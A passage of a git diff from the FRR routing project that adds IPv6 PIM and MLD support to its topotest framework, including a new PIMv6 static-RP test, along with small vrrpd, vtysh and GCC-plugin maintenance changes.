+def verify_pim_interface_traffic(tgen, input_dict, return_stats=True, addr_type="ipv4"):
"""
Verify ip pim interface traffice by running
"show ip pim interface traffic" cli
@@ -3645,6 +3892,8 @@ def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
* `tgen`: topogen object
* `input_dict(dict)`: defines DUT, what and from which interfaces
traffic needs to be verified
+ * [optional]`addr_type`: specify address-family, default is ipv4
+
Usage
-----
input_dict = {
@@ -3675,9 +3924,13 @@ def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying pim interface traffic", dut)
- show_pim_intf_traffic_json = run_frr_cmd(
- rnode, "show ip pim interface traffic json", isjson=True
- )
+
+ if addr_type == "ipv4":
+ cmd = "show ip pim interface traffic json"
+ elif addr_type == "ipv6":
+ cmd = "show ipv6 pim interface traffic json"
+
+ show_pim_intf_traffic_json = run_frr_cmd(rnode, cmd, isjson=True)
output_dict[dut] = {}
for intf, data in input_dict[dut].items():
diff --git a/tests/topotests/lib/topogen.py b/tests/topotests/lib/topogen.py
index c04506f47e..c51a187f28 100644
--- a/tests/topotests/lib/topogen.py
+++ b/tests/topotests/lib/topogen.py
@@ -725,6 +725,7 @@ class TopoRouter(TopoGear):
RD_PBRD = 16
RD_PATH = 17
RD_SNMP = 18
+ RD_PIM6 = 19
RD = {
RD_FRR: "frr",
RD_ZEBRA: "zebra",
@@ -735,6 +736,7 @@ class TopoRouter(TopoGear):
RD_ISIS: "isisd",
RD_BGP: "bgpd",
RD_PIM: "pimd",
+ RD_PIM6: "pim6d",
RD_LDP: "ldpd",
RD_EIGRP: "eigrpd",
RD_NHRP: "nhrpd",
@@ -820,7 +822,8 @@ class TopoRouter(TopoGear):
Possible daemon values are: TopoRouter.RD_ZEBRA, TopoRouter.RD_RIP,
TopoRouter.RD_RIPNG, TopoRouter.RD_OSPF, TopoRouter.RD_OSPF6,
TopoRouter.RD_ISIS, TopoRouter.RD_BGP, TopoRouter.RD_LDP,
- TopoRouter.RD_PIM, TopoRouter.RD_PBR, TopoRouter.RD_SNMP.
+ TopoRouter.RD_PIM, TopoRouter.RD_PIM6, TopoRouter.RD_PBR,
+ TopoRouter.RD_SNMP.
Possible `source` values are `None` for an empty config file, a path name which is
used directly, or a file name with no path components which is first looked for
@@ -1276,6 +1279,7 @@ def diagnose_env_linux(rundir):
"ripngd",
"isisd",
"pimd",
+ "pim6d",
"ldpd",
"pbrd",
]:
diff --git a/tests/topotests/lib/topojson.py b/tests/topotests/lib/topojson.py
index 3ca3353ed3..b49b09e636 100644
--- a/tests/topotests/lib/topojson.py
+++ b/tests/topotests/lib/topojson.py
@@ -41,7 +41,11 @@ from lib.common_config import (
number_to_column,
)
from lib.ospf import create_router_ospf
-from lib.pim import create_igmp_config, create_pim_config
+from lib.pim import (
+ create_igmp_config,
+ create_pim_config,
+ create_mld_config,
+)
from lib.topolog import logger
@@ -332,6 +336,7 @@ def build_config_from_json(tgen, topo=None, save_bkup=True):
("route_maps", create_route_maps),
("pim", create_pim_config),
("igmp", create_igmp_config),
+ ("mld", create_mld_config),
("bgp", create_router_bgp),
("ospf", create_router_ospf),
]
@@ -352,7 +357,9 @@ def build_config_from_json(tgen, topo=None, save_bkup=True):
logger.info("build_config_from_json: failed to configure topology")
pytest.exit(1)
- logger.info("Built config now clearing ospf neighbors as that router-id might not be what is used")
+ logger.info(
+ "Built config now clearing ospf neighbors as that router-id might not be what is used"
+ )
for ospf in ["ospf", "ospf6"]:
for router in data:
if ospf not in data[router]:
diff --git a/tests/topotests/lib/topotest.py b/tests/topotests/lib/topotest.py
index 27b566a8f5..5a3f586f82 100644
--- a/tests/topotests/lib/topotest.py
+++ b/tests/topotests/lib/topotest.py
@@ -1330,6 +1330,7 @@ class Router(Node):
"isisd": 0,
"bgpd": 0,
"pimd": 0,
+ "pim6d": 0,
"ldpd": 0,
"eigrpd": 0,
"nhrpd": 0,
diff --git a/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json b/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json
new file mode 100644
index 0000000000..9edfae4a24
--- /dev/null
+++ b/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json
@@ -0,0 +1,197 @@
+{
+ "address_types": ["ipv6"],
+ "ipv6base": "fd00::",
+ "ipv6mask": 64,
+ "link_ip_start": {
+ "ipv6": "fd00::",
+ "v6mask": 64
+ },
+ "lo_prefix": {
+ "ipv6": "2001:db8:f::",
+ "v6mask": 128
+ },
+ "routers": {
+ "r0": {
+ "links": {
+ "r1": {"ipv6": "auto"}
+ }
+ },
+ "r1": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r0": {"ipv6": "auto", "pim6": "enable"},
+ "r2": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r4": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.0",
+ "neighbors": {
+ "r2": {},
+ "r3": {},
+ "r4": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ },
+ "mld": {
+ "interfaces": {
+ "r1-r0-eth0" :{
+ "mld":{
+ }
+ }
+ }
+ }
+ },
+ "r2": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.1",
+ "neighbors": {
+ "r1": {},
+ "r3": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r3": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r2": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r4": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r5": {"ipv6": "auto", "pim6": "enable"}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.2",
+ "neighbors": {
+ "r1": {},
+ "r2": {},
+ "r4": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r4": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.3",
+ "neighbors": {
+ "r1": {},
+ "r3": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r5": {
+ "links": {
+ "r3": {"ipv6": "auto"}
+ }
+ }
+ }
+}
diff --git a/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py b/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py
new file mode 100755
index 0000000000..bd5473a511
--- /dev/null
+++ b/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py
@@ -0,0 +1,414 @@
+#!/usr/bin/env python
+
+#
+# Copyright (c) 2022 by VMware, Inc. ("VMware")
+# Used Copyright (c) 2018 by Network Device Education Foundation,
+# Inc. ("NetDEF") in this file.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+Following tests are covered to test Multicast basic functionality:
+
+Topology:
+
+ _______r2_____
+ | |
+ iperf | | iperf
+ r0-----r1-------------r3-----r5
+ | |
+ |_____________|
+ r4
+
+Test steps
+- Create topology (setup module)
+- Bring up topology
+
+TC_1 : Verify upstream interfaces(IIF) and join state are updated properly
+ after adding and deleting the static RP
+TC_2 : Verify IIF and OIL in "show ip pim state" updated properly after
+ adding and deleting the static RP
+TC_3: (*, G) Mroute entry are cleared when static RP gets deleted
+TC_4: Verify (*,G) prune is send towards the RP after deleting the static RP
+TC_24 : Verify (*,G) and (S,G) populated correctly when SPT and RPT share the
+ same path
+"""
+
+import os
+import sys
+import json
+import time
+import pytest
+from time import sleep
+import datetime
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+sys.path.append(os.path.join(CWD, "../lib/"))
+
+# Required to instantiate the topology builder class.
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib.topogen import Topogen, get_topogen
+
+from lib.common_config import (
+ start_topology,
+ write_test_header,
+ write_test_footer,
+ reset_config_on_routers,
+ step,
+ shutdown_bringup_interface,
+ kill_router_daemons,
+ start_router_daemons,
+ create_static_routes,
+ check_router_status,
+ socat_send_igmp_join_traffic,
+ topo_daemons
+)
+from lib.pim import (
+ create_pim_config,
+ verify_igmp_groups,
+ verify_upstream_iif,
+ verify_join_state_and_timer,
+ verify_mroutes,
+ verify_pim_neighbors,
+ verify_pim_interface_traffic,
+ verify_pim_rp_info,
+ verify_pim_state,
+ clear_pim_interface_traffic,
+ clear_igmp_interfaces,
+ clear_pim_interfaces,
+ clear_mroute,
+ clear_mroute_verify,
+)
+from lib.topolog import logger
+from lib.topojson import build_topo_from_json, build_config_from_json
+
+# Global variables
+GROUP_RANGE_V6 = "ff08::/64"
+IGMP_JOIN_V6 = "ff08::1"
+STAR = "*"
+SOURCE = "Static"
+
+pytestmark = [pytest.mark.pimd]
+
+
+def build_topo(tgen):
+ """Build function"""
+
+ # Building topology from json file
+ build_topo_from_json(tgen, TOPO)
+
+
+def setup_module(mod):
+ """
+ Sets up the pytest environment
+
+ * `mod`: module name
+ """
+
+ testsuite_run_time = time.asctime(time.localtime(time.time()))
+ logger.info("Testsuite start time: %s", testsuite_run_time)
+ logger.info("=" * 40)
+
+ topology = """
+
+ _______r2_____
+ | |
+ iperf | | iperf
+ r0-----r1-------------r3-----r5
+ | |
+ |_____________|
+ r4
+
+ """
+ logger.info("Master Topology: \n %s", topology)
+
+ logger.info("Running setup_module to create topology")
+
+ # This function initiates the topology build with Topogen...
+ json_file = "{}/multicast_pimv6_static_rp.json".format(CWD)
+ tgen = Topogen(json_file, mod.__name__)
+ global TOPO
+ TOPO = tgen.json_topo
+
+ # ... and here it calls Mininet initialization functions.
+
+ # get list of daemons needs to be started for this suite.
+ daemons = topo_daemons(tgen, TOPO)
+
+ # Starting topology, create tmp files which are loaded to routers
+ # to start daemons and then start routers
+ start_topology(tgen, daemons)
+
+ # Don"t run this test if we have any failure.
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ # Creating configuration from JSON
+ build_config_from_json(tgen, TOPO)
+
+ # Verify PIM neighbors
+ result = verify_pim_neighbors(tgen, TOPO)
+ assert result is True, "setup_module :Failed \n Error:" " {}".format(result)
+
+ logger.info("Running setup_module() done")
+
+
+def teardown_module():
+ """Teardown the pytest environment"""
+
+ logger.info("Running teardown_module to delete topology")
+ tgen = get_topogen()
+
+ # Stop toplogy and Remove tmp files
+ tgen.stop_topology()
+
+ logger.info("Testsuite end time: %s", time.asctime(time.localtime(time.time())))
+ logger.info("=" * 40)
+
+
+#####################################################
+#
+# Testcases
+#
+#####################################################
+
+
+def verify_state_incremented(state_before, state_after):
+ """
+ API to compare interface traffic state incrementing
+
+ Parameters
+ ----------
+ * `state_before` : State dictionary for any particular instance
+ * `state_after` : State dictionary for any particular instance
+ """
+
+ for router, state_data in state_before.items():
+ for state, value in state_data.items():
+ if state_before[router][state] >= state_after[router][state]:
+ errormsg = (
+ "[DUT: %s]: state %s value has not"
+ " incremented, Initial value: %s, "
+ "Current value: %s [FAILED!!]"
+ % (
+ router,
+ state,
+ state_before[router][state],
+ state_after[router][state],
+ )
+ )
+ return errormsg
+
+ logger.info(
+ "[DUT: %s]: State %s value is "
+ "incremented, Initial value: %s, Current value: %s"
+ " [PASSED!!]",
+ router,
+ state,
+ state_before[router][state],
+ state_after[router][state],
+ )
+
+ return True
+
+
+#####################################################
+
+def test_pimv6_add_delete_static_RP_p0(request):
+ """
+ TC_1: Verify upstream interfaces(IIF) and join state are updated
+ properly after adding and deleting the static RP
+ TC_2: Verify IIF and OIL in "show ip pim state" updated properly
+ after adding and deleting the static RP
+ TC_3: (*, G) Mroute entry are cleared when static RP gets deleted
+ TC_4: Verify (*,G) prune is send towards the RP after deleting the
+ static RP
+
+ TOPOlogy used:
+ r0------r1-----r2
+ iperf DUT RP
+ """
+
+ tgen = get_topogen()
+ tc_name = request.node.name
+ write_test_header(tc_name)
+
+ # Don"t run this test if we have any failure.
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+
+ step("Shut link b/w R1 and R3 and R1 and R4 as per tescase topology")
+ intf_r1_r3 = TOPO["routers"]["r1"]["links"]["r3"]["interface"]
+ intf_r1_r4 = TOPO["routers"]["r1"]["links"]["r4"]["interface"]
+ for intf in [intf_r1_r3, intf_r1_r4]:
+ shutdown_bringup_interface(tgen, "r1", intf, ifaceaction=False)
+
+ step("Enable PIM between r1 and r2")
+ step("Enable MLD on r1 interface and send IGMP " "join (FF08::1) to r1")
+ step("Configure r2 loopback interface as RP")
+ input_dict = {
+ "r2": {
+ "pim6": {
+ "rp": [
+ {
+ "rp_addr": TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split(
+ "/"
+ )[0],
+ "group_addr_range": GROUP_RANGE_V6,
+ }
+ ]
+ }
+ }
+ }
+
+ result = create_pim_config(tgen, TOPO, input_dict)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify show ip pim interface traffic without any mld join")
+ state_dict = {
+ "r1": {TOPO["routers"]["r1"]["links"]["r2"]["interface"]: ["pruneTx"]}
+ }
+
+ state_before = verify_pim_interface_traffic(tgen, state_dict, addr_type="ipv6")
+ assert isinstance(
+ state_before, dict
+ ), "Testcase{} : Failed \n state_before is not dictionary \n " "Error: {}".format(
+ tc_name, result
+ )
+
+ step("send mld join (FF08::1) to R1")
+ intf = TOPO["routers"]["r0"]["links"]["r1"]["interface"]
+ intf_ip = TOPO["routers"]["r0"]["links"]["r1"]["ipv6"].split("/")[0]
+ result = socat_send_igmp_join_traffic(
+ tgen, "r0", "UDP6-RECV", IGMP_JOIN_V6, intf, intf_ip, join=True
+ )
+ assert result is True, "Testcase {}: Failed Error: {}".format(tc_name, result)
+
+ step("r1: Verify RP info")
+ dut = "r1"
+ oif = TOPO["routers"]["r1"]["links"]["r2"]["interface"]
+ iif = TOPO["routers"]["r1"]["links"]["r0"]["interface"]
+ rp_address = TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split("/")[0]
+ result = verify_pim_rp_info(
+ tgen, TOPO, dut, GROUP_RANGE_V6, oif, rp_address, SOURCE
+ )
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify upstream IIF interface")
+ result = verify_upstream_iif(tgen, dut, oif, STAR, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify upstream join state and join timer")
+ result = verify_join_state_and_timer(tgen, dut, oif, STAR, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify PIM state")
+ result = verify_pim_state(tgen, dut, oif, iif, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify ip mroutes")
+ result = verify_mroutes(tgen, dut, STAR, IGMP_JOIN_V6, oif, iif)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Delete RP configuration")
+ input_dict = {
+ "r2": {
+ "pim6": {
+ "rp": [
+ {
+ "rp_addr": TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split(
+ "/"
+ )[0],
+ "group_addr_range": GROUP_RANGE_V6,
+ "delete": True,
+ }
+ ]
+ }
+ }
+ }
+
+ result = create_pim_config(tgen, TOPO, input_dict)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("r1: Verify RP info")
+ result = verify_pim_rp_info(
+ tgen, TOPO, dut, GROUP_RANGE_V6, oif, rp_address, SOURCE, expected=False
+ )
+ assert (
+ result is not True
+ ), "Testcase {} :Failed \n " "RP: {} info is still present \n Error: {}".format(
+ tc_name, rp_address, result
+ )
+
+ step("r1: Verify upstream IIF interface")
+ result = verify_upstream_iif(tgen, dut, oif, STAR, IGMP_JOIN_V6, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "Upstream ({}, {}) is still in join state \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify upstream join state and join timer")
+ result = verify_join_state_and_timer(
+ tgen, dut, oif, STAR, IGMP_JOIN_V6, expected=False
+ )
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "Upstream ({}, {}) timer is still running \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify PIM state")
+ result = verify_pim_state(tgen, dut, oif, iif, IGMP_JOIN_V6, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "PIM state for group: {} is still Active \n Error: {}".format(
+ tc_name, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify ip mroutes")
+ result = verify_mroutes(tgen, dut, STAR, IGMP_JOIN_V6, oif, iif, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "mroute ({}, {}) is still present \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify show ip pim interface traffic without any IGMP join")
+ state_after = verify_pim_interface_traffic(tgen, state_dict, addr_type="ipv6")
+ assert isinstance(
+ state_after, dict
+ ), "Testcase{} : Failed \n state_before is not dictionary \n " "Error: {}".format(
+ tc_name, result
+ )
+
+ result = verify_state_incremented(state_before, state_after)
+ assert result is True, "Testcase{} : Failed Error: {}".format(tc_name, result)
+
+ write_test_footer(tc_name)
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
index 8c855620be..58d37a368c 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
index e7d0621df8..85646a8fab 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
index 4cb3747c56..ec97c254d1 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper3.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
diff --git a/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py b/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
index 3967f5f42a..59ba8236c7 100644
--- a/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
+++ b/tests/topotests/ospfv3_basic_functionality/test_ospfv3_asbr_summary_topo1.py
@@ -68,6 +68,7 @@ from lib.ospf import (
verify_ospf_summary,
)
+pytestmark = [pytest.mark.ospfd, pytest.mark.staticd]
# Global variables
topo = None
diff --git a/tools/gcc-plugins/frr-format.c b/tools/gcc-plugins/frr-format.c
index e9f397f225..0a24b091a3 100644
--- a/tools/gcc-plugins/frr-format.c
+++ b/tools/gcc-plugins/frr-format.c
@@ -1042,7 +1042,7 @@ check_format_info (function_format_info *info, tree params,
format_ctx.arglocs = arglocs;
check_function_arguments_recurse (check_format_arg, &format_ctx,
- format_tree, arg_num);
+ format_tree, arg_num, OPT_Wformat_);
location_t loc = format_ctx.res->format_string_loc;
diff --git a/tools/gcc-plugins/gcc-common.h b/tools/gcc-plugins/gcc-common.h
index ec45de1a53..9f59447d63 100644
--- a/tools/gcc-plugins/gcc-common.h
+++ b/tools/gcc-plugins/gcc-common.h
@@ -982,4 +982,9 @@ static inline void debug_gimple_stmt(const_gimple s)
#define SET_DECL_MODE(decl, mode) DECL_MODE(decl) = (mode)
#endif
+#if BUILDING_GCC_VERSION < 12000
+#define check_function_arguments_recurse(arg, ctx, tree, num, opt) \
+ check_function_arguments_recurse(arg, ctx, tree, num)
+#endif
+
#endif
diff --git a/vrrpd/vrrp.c b/vrrpd/vrrp.c
index 3081c0d955..4a0356411f 100644
--- a/vrrpd/vrrp.c
+++ b/vrrpd/vrrp.c
@@ -985,7 +985,7 @@ static int vrrp_recv_advertisement(struct vrrp_router *r, struct ipaddr *src,
*/
static void vrrp_read(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
struct vrrp_pkt *pkt;
ssize_t pktsize;
@@ -1480,7 +1480,7 @@ static void vrrp_change_state(struct vrrp_router *r, int to)
*/
static void vrrp_adver_timer_expire(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
DEBUGD(&vrrp_dbg_proto,
VRRP_LOGPFX VRRP_LOGPFX_VRID VRRP_LOGPFX_FAM
@@ -1508,7 +1508,7 @@ static void vrrp_adver_timer_expire(struct thread *thread)
*/
static void vrrp_master_down_timer_expire(struct thread *thread)
{
- struct vrrp_router *r = thread->arg;
+ struct vrrp_router *r = THREAD_ARG(thread);
zlog_info(VRRP_LOGPFX VRRP_LOGPFX_VRID VRRP_LOGPFX_FAM
"Master_Down_Timer expired",
diff --git a/vtysh/vtysh.c b/vtysh/vtysh.c
index 21bd2f4883..f39ecf0709 100644
--- a/vtysh/vtysh.c
+++ b/vtysh/vtysh.c
@@ -51,6 +51,7 @@
#include "frrstr.h"
#include "json.h"
#include "ferr.h"
+#include "bgpd/bgp_vty.h"
DEFINE_MTYPE_STATIC(MVTYSH, VTYSH_CMD, "Vtysh cmd copy");
@@ -885,10 +886,23 @@ int vtysh_config_from_file(struct vty *vty, FILE *fp)
int lineno = 0;
/* once we have an error, we remember & return that */
int retcode = CMD_SUCCESS;
+ char *vty_buf_copy = XCALLOC(MTYPE_VTYSH_CMD, VTY_BUFSIZ);
+ char *vty_buf_trimmed = NULL;
while (fgets(vty->buf, VTY_BUFSIZ, fp)) {
lineno++;
+ strlcpy(vty_buf_copy, vty->buf, VTY_BUFSIZ);
+ vty_buf_trimmed = trim(vty_buf_copy);
+
+ /*
+ * Ignore the "end" lines, we will generate these where
+ * appropriate, otherwise we never execute
+ * XFRR_end_configuration, and start/end markers do not work.
+ */
+ if (strmatch(vty_buf_trimmed, "end"))
+ continue;
+
ret = command_config_read_one_line(vty, &cmd, lineno, 1);
switch (ret) {
@@ -955,6 +969,8 @@ int vtysh_config_from_file(struct vty *vty, FILE *fp)
}
}
+ XFREE(MTYPE_VTYSH_CMD, vty_buf_copy);
+
return (retcode);
}
@@ -1685,8 +1701,8 @@ DEFUNSH(VTYSH_BGPD, router_bgp, router_bgp_cmd,
DEFUNSH(VTYSH_BGPD, address_family_vpnv4, address_family_vpnv4_cmd,
"address-family vpnv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -1695,8 +1711,8 @@ DEFUNSH(VTYSH_BGPD, address_family_vpnv4, address_family_vpnv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_vpnv6, address_family_vpnv6_cmd,
"address-family vpnv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -1706,8 +1722,8 @@ DEFUNSH(VTYSH_BGPD, address_family_vpnv6, address_family_vpnv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv4, address_family_ipv4_cmd,
"address-family ipv4 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4_NODE;
return CMD_SUCCESS;
@@ -1716,8 +1732,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4, address_family_ipv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_flowspecv4, address_family_flowspecv4_cmd,
"address-family ipv4 flowspec",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_FLOWSPECV4_NODE;
return CMD_SUCCESS;
@@ -1726,8 +1742,8 @@ DEFUNSH(VTYSH_BGPD, address_family_flowspecv4, address_family_flowspecv4_cmd,
DEFUNSH(VTYSH_BGPD, address_family_flowspecv6, address_family_flowspecv6_cmd,
"address-family ipv6 flowspec",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family Modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_FLOWSPECV6_NODE;
return CMD_SUCCESS;
@@ -1736,8 +1752,8 @@ DEFUNSH(VTYSH_BGPD, address_family_flowspecv6, address_family_flowspecv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv4_multicast,
address_family_ipv4_multicast_cmd, "address-family ipv4 multicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4M_NODE;
return CMD_SUCCESS;
@@ -1746,8 +1762,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_multicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv4_vpn, address_family_ipv4_vpn_cmd,
"address-family ipv4 vpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV4_NODE;
return CMD_SUCCESS;
@@ -1757,8 +1773,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_labeled_unicast,
address_family_ipv4_labeled_unicast_cmd,
"address-family ipv4 labeled-unicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV4L_NODE;
